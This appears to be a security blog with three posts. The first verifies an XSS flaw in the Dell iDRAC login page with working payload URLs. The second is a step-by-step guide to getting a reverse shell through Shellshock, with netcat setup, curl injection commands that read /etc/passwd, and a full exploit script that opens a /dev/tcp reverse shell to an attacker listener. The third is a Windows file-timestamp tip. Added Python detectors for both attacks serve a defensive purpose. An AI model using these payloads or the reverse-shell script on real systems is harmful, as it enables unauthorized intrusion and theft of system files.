Thursday, March 19, 2015

How to verify CVE-2013-3589 (Dell iDRAC 6 and iDRAC 7 XSS Vulnerability)


1.   Nessus description:

The remote Dell Remote Access Controller (iDRAC6 / iDRAC7) is affected by a cross-site scripting vulnerability. The login page does not properly sanitize user-supplied input to the 'ErrorMsg' parameter. An attacker could leverage this to inject arbitrary HTML and script code into a user's browser to be executed within the security context of the affected site.

2.   Demonstration:

1) The login page does filter some JavaScript, so the common test payload <script>alert(1)</script> will not work.
2) Example 1: pop up a JavaScript alert box.
https://192.168.xxx.xxx/login.html?ErrorMsg=%3Cimg%20src=asdf%20onerror=alert%28%22XSS%22%29%3E

3) Example 2: open https://google.com in a new window.
https://192.168.xxx.xxx/login.html?ErrorMsg="><img src=x onerror=window.open('https://google.com/');>
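As an added example (not part of the original post), here is a Python script that scans web-server access log lines for requests to login.html whose ErrorMsg parameter carries HTML markup, which is how a defender would spot probes for this issue in iDRAC or reverse-proxy logs. The combined-log format and the sample lines are constructed for the example; the two decoded payloads in them are the ones shown above.

```python
# Added example (not from the original post): flag requests whose ErrorMsg
# query parameter carries HTML markup, as a detection for CVE-2013-3589-style
# probes against the iDRAC login page. Log format and lines are constructed.
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in a common combined-log style.
SAMPLE_LOG = """\
10.0.0.5 - - [19/Mar/2015:10:01:02 +0000] "GET /login.html?ErrorMsg=Login%20failed HTTP/1.1" 200 512
10.0.0.9 - - [19/Mar/2015:10:01:07 +0000] "GET /login.html?ErrorMsg=%3Cimg%20src=asdf%20onerror=alert%28%22XSS%22%29%3E HTTP/1.1" 200 612
10.0.0.9 - - [19/Mar/2015:10:01:09 +0000] "GET /login.html?ErrorMsg=%22%3E%3Cimg%20src=x%20onerror=window.open(%27https://google.com/%27);%3E HTTP/1.1" 200 640
10.0.0.7 - - [19/Mar/2015:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 1024
"""

REQUEST_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# Markers of HTML injection in a decoded value: a tag start, an on* event
# handler attribute, or a javascript: URL.
MARKUP_RE = re.compile(r'<[a-zA-Z/]|\bon[a-z]+\s*=|javascript:', re.IGNORECASE)

def error_msg_values(target):
    """Return the percent-decoded ErrorMsg values of a login.html request, or []."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith('/login.html'):
        return []
    return parse_qs(parts.query, keep_blank_values=True).get('ErrorMsg', [])

def find_xss_probes(log_text):
    """Return (source_ip, timestamp, decoded_value) for every request whose
    ErrorMsg contains markup."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        for value in error_msg_values(m.group('target')):
            if MARKUP_RE.search(value):
                hits.append((m.group('src'), m.group('ts'), value))
    return hits

if __name__ == '__main__':
    for src, ts, value in find_xss_probes(SAMPLE_LOG):
        print(f"{ts} {src} ErrorMsg contains markup: {value!r}")
```

The decode step matters: the second sample line only reveals the img tag after percent-decoding, so a detector that greps the raw URL for "<" would miss it.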

3.   Recommendation:

1) Upgrade to firmware version 1.96 (iDRAC6) / 1.46.45 (iDRAC7) or later.

4.   References:

1). http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3589
2). http://www.tenable.com/plugins/index.php?view=single&id=70411

Monday, October 20, 2014

How to get reverse shell with BASH (shellshock) vulnerability?

Prerequisites:
1. Kali Linux
2. Download the Python code from http://pastebin.com/166f8Rjx and save it as “shellshock.py”

3. If you are attacking an HTTPS site, change line 12 to conn = httplib.HTTPSConnection(sys.argv[1]); here I save that version as “shellshocks.py”

4. Your Kali Linux IP
5. The vulnerable host IP

Steps:

1. Run the command “nc -lvp 9999” to listen on port 9999; you can change the port number if you want.

2. Open another window and run command “python shellshocks.py 10.10.x.x /ucsm/isSamInstalled.cgi 172.16.x.x/9999”. 10.10.x.x is the vulnerable host. 172.16.x.x is my Kali Linux IP.

3. Now you can get the shell:

Some commands that can be used to verify Shellshock:
1. curl --insecure -H "User-Agent: () { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id" https://10.10.x.x/ucsm/isSamInstalled.cgi
2. curl --insecure -H "User-Agent: () { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /bin/cat /etc/passwd" https://10.10.x.x/ucsm/isSamInstalled.cgi
3. curl --insecure -A "X: () { :;}; echo; /bin/cat /etc/passwd; 2>&1; exit" https://10.10.x.x/ucsm/isSamInstalled.cgi
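Added example, not part of the original post or the pastebin script: a Python detector for the Shellshock header pattern in raw HTTP requests, the kind of check a WAF rule or a log review would apply. It flags any header whose value contains the bash function-definition prefix "() {" followed by a command, because a CGI server exports every request header as an HTTP_* environment variable and an unpatched bash would import the value as a function. The sample requests are constructed; the User-Agent value in the probe mirrors the first curl command above.

```python
# Added example (not from the original post): flag Shellshock (CVE-2014-6271)
# probes in HTTP request headers. Sample requests are constructed; the probe's
# User-Agent value mirrors the curl command in the post.
import re

# bash's function-import format: "() {", a body, "}", and then whatever follows
# the closing brace is executed. The search is deliberately loose (anywhere in
# the value) so prefixed variants are also reported for review.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{[^}]*\}\s*;\s*(?P<payload>.*)')

BENIGN = ("GET /ucsm/isSamInstalled.cgi HTTP/1.1\r\n"
          "Host: 10.10.0.2\r\n"
          "User-Agent: Mozilla/5.0\r\n\r\n")
PROBE = ("GET /ucsm/isSamInstalled.cgi HTTP/1.1\r\n"
         "Host: 10.10.0.2\r\n"
         "User-Agent: () { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id\r\n\r\n")
# CGI exports every header as HTTP_<NAME>, so the marker can sit in any header,
# not only User-Agent.
CUSTOM = ("GET /ucsm/isSamInstalled.cgi HTTP/1.1\r\n"
          "Host: 10.10.0.2\r\n"
          "test: () { :; }; /usr/bin/id\r\n\r\n")

def parse_request_headers(raw):
    """Split a raw request into its request line and a {lower-name: value} dict."""
    lines = raw.split('\r\n')
    headers = {}
    for line in lines[1:]:
        if not line:            # blank line ends the header block
            break
        name, _, value = line.partition(':')
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers

def find_shellshock(raw):
    """Return (request_line, [(header_name, payload), ...]) for a raw request."""
    request_line, headers = parse_request_headers(raw)
    findings = []
    for name, value in headers.items():
        m = SHELLSHOCK_RE.search(value)
        if m:
            findings.append((name, m.group('payload').strip()))
    return request_line, findings

if __name__ == '__main__':
    for label, raw in (('benign', BENIGN), ('probe', PROBE), ('custom', CUSTOM)):
        line, hits = find_shellshock(raw)
        print(label, line, hits or 'clean')
```

The payload capture is what an analyst wants in the alert: it shows what the probe tried to run, which separates a scanner's harmless /usr/bin/id from an attempt to spawn a shell.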

Appendix: the source code (from http://pastebin.com/166f8Rjx)
#
#CVE-2014-6271 cgi-bin reverse shell
#

import httplib,urllib,sys

if (len(sys.argv)<4):
    print "Usage: %s <host> <cgi-path> <listener-ip/port>" % sys.argv[0]
    print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0]
    exit(0)

conn = httplib.HTTPConnection(sys.argv[1])
reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3]

headers = {"Content-type": "application/x-www-form-urlencoded",
    "test":reverse_shell }
conn.request("GET",sys.argv[2],headers=headers)
res = conn.getresponse()
print res.status, res.reason
data = res.read()
print data

Wednesday, August 13, 2014

Change file timestamp in Windows

Sometimes you need to update a file’s timestamp without changing the content of the file. The copy command offers an easy way to do it:

copy /b filename.ext +,,

This command assigns the current date and time to filename.ext without modifying its content. It replaces the original file, so make sure you have a backup of the file first.

For reference, check: http://technet.microsoft.com/en-us/library/bb490886.aspx
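Added example (not from the original post): the same effect done from Python with os.utime, which rewrites only the timestamps instead of recreating the file as copy does, with a content hash taken before and after to confirm nothing else changed. From a forensics standpoint it is also a reminder that modification times are under the user's control; on POSIX systems the inode change time (st_ctime) is set by the kernel and cannot be chosen through utime, so the example reports it alongside mtime. The sample file is constructed inside demo().

```python
# Added example (not from the original post): refresh a file's timestamps in
# place with os.utime and verify the content is untouched. All inputs are
# constructed inside demo().
import hashlib
import os
import tempfile
import time

def sha256_of(path):
    """Hex SHA-256 of the file content, used to prove the content did not change."""
    with open(path, 'rb') as f:
        return hashlib.sha256(f.read()).hexdigest()

def touch_in_place(path, when=None):
    """Set atime and mtime of path to `when` (default: now) without rewriting it.
    Returns (digest_before, digest_after, st_mtime, st_ctime)."""
    before = sha256_of(path)
    when = time.time() if when is None else when
    os.utime(path, (when, when))          # timestamps only; no data is written
    st = os.stat(path)
    # On POSIX, st_ctime is bumped by the kernel to the real current time and
    # cannot be set through utime; forensic tools compare it against mtime.
    return before, sha256_of(path), st.st_mtime, st.st_ctime

def demo():
    """Create a constructed sample file, back-date it, then refresh its timestamp."""
    workdir = tempfile.mkdtemp()
    path = os.path.join(workdir, 'filename.ext')
    with open(path, 'wb') as f:
        f.write(b'constructed sample content\n')
    os.utime(path, (1_000_000_000, 1_000_000_000))   # back-date to 2001
    old_mtime = os.stat(path).st_mtime
    before, after, new_mtime, ctime = touch_in_place(path)
    return {'content_unchanged': before == after,
            'old_mtime': old_mtime, 'new_mtime': new_mtime, 'ctime': ctime}

if __name__ == '__main__':
    print(demo())
```

Unlike copy /b filename.ext +,, this does not replace the file, so no backup is needed, and the hash comparison is the check to keep if you script this in an environment where file integrity is monitored.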